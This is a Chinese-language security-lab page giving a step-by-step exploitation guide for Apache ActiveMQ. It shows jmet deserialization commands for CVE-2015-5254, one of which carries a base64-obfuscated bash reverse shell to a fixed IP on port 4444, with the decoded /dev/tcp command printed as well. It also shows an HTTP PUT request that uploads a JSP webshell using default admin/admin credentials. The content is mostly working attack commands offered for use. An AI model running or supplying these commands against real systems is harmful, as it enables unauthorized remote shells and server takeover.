ActiveMQ getshell利用-lanc 0X01 ActiveMQ 反序列化漏洞(CVE-2015-5254)-漏洞文库小世界-安全文库-NGC660安全实验室

ActiveMQ getshell利用-lanc 0X01 ActiveMQ 反序列化漏洞(CVE-2015-5254)

###ActiveMQ getshell利用-lanc

0X01 ActiveMQ 反序列化漏洞(CVE-2015-5254)

java -jar /Users/fengxiao/tool/工具/内网渗透/ActiveMQ/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 127.0.0.1 61616

61616端口则是工作端口,消息在这个端口进行传递

1641781012750-461d9f60-3ee5-489e-9bc9-64ff0a99570a

后台账号密码(admin/admin) 登录上可看到

1641781036847-9df05f49-44ad-4b6d-93a7-6ebe45b674f5

点击此条消息,如果在docker中的/tmp目录下中创建了success文件,则表明该漏洞可以利用

1641781122820-5ba5caad-c36b-4590-b99b-6bf829d84a29

1641781163883-594a8a9a-3f40-478a-ac80-28d10b13e2d1

java -jar /Users/fengxiao/tool/工具/内网渗透/ActiveMQ/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTExLjExNS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 127.0.0.1 61616

bash -i >& /dev/tcp/172.16.111.115/4444 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTExLjExNS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

通过点击添加的消息,反弹shell

1641781186779-8d1e4e21-d7e3-45c1-9328-f2edb73c7c4f

1641781217487-2bc97364-ba4c-4540-8ca1-ba94b387b539

0X02 ActiveMQ PUT 上传

PUT /fileserver/shell.jsp HTTP/1.1
Host: 192.168.197.25:8161
User-Agent: Mozilla/5.0 (Windows NT 6.1;    Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,applicatio  n/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 26

shell

通过该地址可查询路径: http://127.0.0.1:8161/admin/test/systemProperties.jsp

1641781248171-82db69b5-cb7b-43a7-a299-208ecc43b5cb

204代表成功

1641781265856-1d0f5422-2e8e-4180-af2d-76e7da96014c

查看ActiveMQ下目录,发现shell上传成功

1641781298957-0fef5d63-039e-4c24-a77a-aed2e70a8680

请登录后发表评论

    请登录后查看回复内容